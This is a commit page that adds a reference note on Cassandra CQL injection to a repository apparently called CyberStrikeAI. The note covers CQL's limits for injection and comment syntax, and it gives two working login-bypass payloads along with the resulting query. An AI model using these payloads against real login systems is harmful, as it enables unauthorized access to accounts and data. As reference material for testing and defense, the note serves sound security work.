CalvinBackup/CyberStrikeAI
1
0
Fork 0
mirror of https://github.com/Ed1s0nZ/CyberStrikeAI.git synced 2026-04-01 00:30:33 +02:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
公明
2025-12-20 18:02:23 +08:00
committed by GitHub
parent ca61ea5813
commit e82b7db091
10 changed files with 3096 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

57
SQL Injection/Cassandra Injection.md Normal file
View File

@@ -0,0 +1,57 @@
# Cassandra Injection
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.
## Summary
* [CQL Injection Limitations](#cql-injection-limitations)
* [Cassandra Comment](#cassandra-comment)
* [Cassandra Login Bypass](#cassandra-login-bypass)
* [Example #1](#example-1)
* [Example #2](#example-2)
* [References](#references)
## CQL Injection Limitations
* Cassandra is a non-relational database, so CQL doesn't support `JOIN` or `UNION` statements, which makes cross-table queries more challenging.
* Additionally, Cassandra lacks convenient built-in functions like `DATABASE()` or `USER()` for retrieving database metadata.
* Another limitation is the absence of the `OR` operator in CQL, which prevents creating always-true conditions; for instance, a query like `SELECT * FROM table WHERE col1='a' OR col2='b';` will be rejected.
* Time-based SQL injections, which typically rely on functions like `SLEEP()` to introduce a delay, are also difficult to execute in CQL since it doesnt include a `SLEEP()` function.
* CQL does not allow subqueries or other nested statements, so a query like `SELECT * FROM table WHERE column=(SELECT column FROM table LIMIT 1);` would be rejected.
## Cassandra Comment
```sql
/* Cassandra Comment */
```
## Cassandra Login Bypass
### Example #1
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Example #2
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
## References
* [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
* [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)